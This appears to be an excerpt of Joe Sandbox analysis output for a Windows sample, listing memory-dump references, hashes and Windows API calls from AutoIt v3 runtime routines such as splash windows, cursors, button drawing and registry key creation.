                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                        APIs
                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 4040870279-2373415609
                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                        • String ID:
                                                                        • API String ID: 69173610-0
                                                                        • Opcode ID: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                        • Opcode Fuzzy Hash: c8a6ac4ae8f443655677bc86ae764d03f57232e15dc5d5dcac45869bbcc4533b
                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-3360698832
                                                                        • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                        • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load
                                                                        • String ID:
                                                                        • API String ID: 1675784387-0
                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                        APIs
                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1582027408-0
                                                                        • Opcode ID: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                        • Opcode Fuzzy Hash: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseConnectCreateRegistry
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 3217815495-966354055
                                                                        • Opcode ID: cc51306d31ed6c8e05796ddcf504f705dab8229ec76f85ad91dfb98ceec273a0
                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                        • Opcode Fuzzy Hash: cc51306d31ed6c8e05796ddcf504f705dab8229ec76f85ad91dfb98ceec273a0
                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
